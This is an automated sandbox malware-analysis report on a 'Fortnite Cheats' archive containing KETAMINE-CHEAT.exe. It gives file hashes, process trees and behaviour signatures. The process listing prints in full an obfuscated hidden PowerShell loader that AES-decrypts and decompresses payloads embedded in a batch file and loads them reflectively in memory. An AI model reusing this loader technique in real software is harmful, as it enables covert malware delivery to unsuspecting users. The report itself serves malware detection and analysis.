Overview
overview
10Static
static
3Fortnite Cheats.rar
windows7-x64
3Fortnite Cheats.rar
windows10-2004-x64
3New folder...AT.exe
windows7-x64
7New folder...AT.exe
windows10-2004-x64
10New folder...ll.bat
windows7-x64
7New folder...ll.bat
windows10-2004-x64
10New folder...ll.bat
windows7-x64
7New folder...ll.bat
windows10-2004-x64
10Analysis
-
max time kernel
117s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
23/04/2024, 00:44
Static task
static1
Behavioral task
behavioral1
Sample
Fortnite Cheats.rar
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Fortnite Cheats.rar
Resource
win10v2004-20240412-en
Behavioral task
behavioral3
Sample
New folder/KETAMINE-CHEAT.exe
Resource
win7-20240215-en
Behavioral task
behavioral4
Sample
New folder/KETAMINE-CHEAT.exe
Resource
win10v2004-20240412-en
Behavioral task
behavioral5
Sample
New folder/KETAMINE.dll.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
New folder/KETAMINE.dll.bat
Resource
win10v2004-20240412-en
Behavioral task
behavioral7
Sample
New folder/giu3.2.dll.bat
Resource
win7-20240221-en
General
-
Target
New folder/KETAMINE-CHEAT.exe
-
Size
704KB
-
MD5
ec00d1aeed783336a6e3491a5718133d
-
SHA1
dea299c6ea1c07fe8d33062353744a4c4bbdcea0
-
SHA256
d0dd7a5e6716487963ba798b5c05fddc98884e3b9a13be3470d36937ba703dec
-
SHA512
8931972fe3533f5c894d98546e450ac384e6a2bf3cbdc09fcedb1bd529a156191eced25df18186cc08130e915b242ba3ac675406316407cd33712897a8dc3801
-
SSDEEP
12288:NPunE2KxcEOwiaNMSZwmbWxXaK8LAm2jzOe4ccnEL6RYv9d4Q/:+P2da5GLpKD4cWE+RYvF
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1440 hello.exe -
Loads dropped DLL 2 IoCs
pid Process 1512 KETAMINE-CHEAT.exe 1512 KETAMINE-CHEAT.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2112 powershell.exe 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2112 powershell.exe Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 1512 wrote to memory of 2368 1512 KETAMINE-CHEAT.exe 28 PID 1512 wrote to memory of 2368 1512 KETAMINE-CHEAT.exe 28 PID 1512 wrote to memory of 2368 1512 KETAMINE-CHEAT.exe 28 PID 1512 wrote to memory of 1440 1512 KETAMINE-CHEAT.exe 30 PID 1512 wrote to memory of 1440 1512 KETAMINE-CHEAT.exe 30 PID 1512 wrote to memory of 1440 1512 KETAMINE-CHEAT.exe 30 PID 2368 wrote to memory of 2144 2368 cmd.exe 31 PID 2368 wrote to memory of 2144 2368 cmd.exe 31 PID 2368 wrote to memory of 2144 2368 cmd.exe 31 PID 1440 wrote to memory of 2596 1440 hello.exe 32 PID 1440 wrote to memory of 2596 1440 hello.exe 32 PID 1440 wrote to memory of 2596 1440 hello.exe 32 PID 2144 wrote to memory of 2644 2144 net.exe 33 PID 2144 wrote to memory of 2644 2144 net.exe 33 PID 2144 wrote to memory of 2644 2144 net.exe 33 PID 2596 wrote to memory of 2236 2596 cmd.exe 35 PID 2596 wrote to memory of 2236 2596 cmd.exe 35 PID 2596 wrote to memory of 2236 2596 cmd.exe 35 PID 2236 wrote to memory of 2556 2236 net.exe 36 PID 2236 wrote to memory of 2556 2236 net.exe 36 PID 2236 wrote to memory of 2556 2236 net.exe 36 PID 2368 wrote to memory of 2112 2368 cmd.exe 37 PID 2368 wrote to memory of 2112 2368 cmd.exe 37 PID 2368 wrote to memory of 2112 2368 cmd.exe 37 PID 2596 wrote to memory of 2752 2596 cmd.exe 38 PID 2596 wrote to memory of 2752 2596 cmd.exe 38 PID 2596 wrote to memory of 2752 2596 cmd.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\New folder\KETAMINE-CHEAT.exe"C:\Users\Admin\AppData\Local\Temp\New folder\KETAMINE-CHEAT.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\XClient.bat" "2⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\net.exenet file3⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file4⤵PID:2644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZyunlpjDuREdU2M686QeyhGLd/9/V2sLG5kMPZTs5r4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhIctKXujiK2gckoW8dcbw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BeuAp=New-Object System.IO.MemoryStream(,$param_var); $XwaSC=New-Object System.IO.MemoryStream; $HwkYx=New-Object System.IO.Compression.GZipStream($BeuAp, [IO.Compression.CompressionMode]::Decompress); $HwkYx.CopyTo($XwaSC); $HwkYx.Dispose(); $BeuAp.Dispose(); $XwaSC.Dispose(); $XwaSC.ToArray();}function execute_function($param_var,$param2_var){ $wipWa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aCKZP=$wipWa.EntryPoint; $aCKZP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\XClient.bat';$oyQri=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\XClient.bat').Split([Environment]::NewLine);foreach ($qDozU in $oyQri) { if ($qDozU.StartsWith(':: ')) { $whQZb=$qDozU.Substring(3); break; }}$payloads_var=[string[]]$whQZb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2112
-
-
-
C:\Users\Admin\AppData\Local\hello.exe"C:\Users\Admin\AppData\Local\hello.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1440 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\13DE.tmp\13DF.tmp\13E0.bat C:\Users\Admin\AppData\Local\hello.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Windows\system32\net.exenet file4⤵
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file5⤵PID:2556
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZyunlpjDuREdU2M686QeyhGLd/9/V2sLG5kMPZTs5r4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yhIctKXujiK2gckoW8dcbw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BeuAp=New-Object System.IO.MemoryStream(,$param_var); $XwaSC=New-Object System.IO.MemoryStream; $HwkYx=New-Object System.IO.Compression.GZipStream($BeuAp, [IO.Compression.CompressionMode]::Decompress); $HwkYx.CopyTo($XwaSC); $HwkYx.Dispose(); $BeuAp.Dispose(); $XwaSC.Dispose(); $XwaSC.ToArray();}function execute_function($param_var,$param2_var){ $wipWa=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $aCKZP=$wipWa.EntryPoint; $aCKZP.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\hello.exe';$oyQri=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\hello.exe').Split([Environment]::NewLine);foreach ($qDozU in $oyQri) { if ($qDozU.StartsWith(':: ')) { $whQZb=$qDozU.Substring(3); break; }}$payloads_var=[string[]]$whQZb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('C:\Users\Admin\AppData\Local\hello.exe'));4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
285KB
MD5333e3186bc209041d294e11e2c65a052
SHA1aeae199bf2aff2204e4c256cb3aef64fbb254b7f
SHA256bdafd08fe990412211cdf96c9474bf58fc90c5164d7c4a3226853099ce5e5958
SHA512382035cbef19aa1fcc3216232dcf92c535c126bc015c976b3ad1959af934cc62dabb250d8083dbd01a1f966f8d455f8391cadedbbe55b3d7056dffff20d13658
-
Filesize
286KB
MD5e44c02291aba12dc736282dda16dd900
SHA125f0f2c50b4fe6ed7df1bb537891ed89a43f6ece
SHA256c45bc03f8edea26265087080f0b244fbc4f3c6ed17b7fcd87f7ca0fca2bb3ca0
SHA512a0b4a2ed00733f489894824dc9fd195a2b61801c5e2d4a417bdf8dd7bf5f3ddf5615442acd0ae053e3dca91c04dc85297fe6139d09a7262a399f5758f33874dc
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\JV8U26NLYV0T2IA1XTBA.temp
Filesize7KB
MD5fb8709bec6bf2fca0a92db9dce0463b3
SHA11d9a05104f1de7c6c5dd466d3bb14f0d156e3e35
SHA256f3e740cf9ed02d7027e193e4e811d34dc4b76788c65602c674ad65135a836006
SHA51286b66acb68c03bf43613ce51a16d6437b093963e84ac52a3e25c5aadaa9dfba0b612adc52b6361462ee609460ff4f789e86d8173b0ba3dcb7cd1bb72e41d9a31
-
Filesize
405KB
MD5745e52027f7364b1475a181a1fbc8e99
SHA173ab36e80a66ef37b2c9df394832a4dc26924ce3
SHA25645cd85c4459eb5f19fc8db2a4de45a3b3edb257e3ad391bdf0e6fb11b7aec4b4
SHA5123318aeaa40e4698573acb0c8d22649704ed06cb560c0cec6ab5a61cbf5d5e16e46b4d6bd50ee32e67bbcfdf9381a2bca6f0d496d653625eeed50dd735215abd2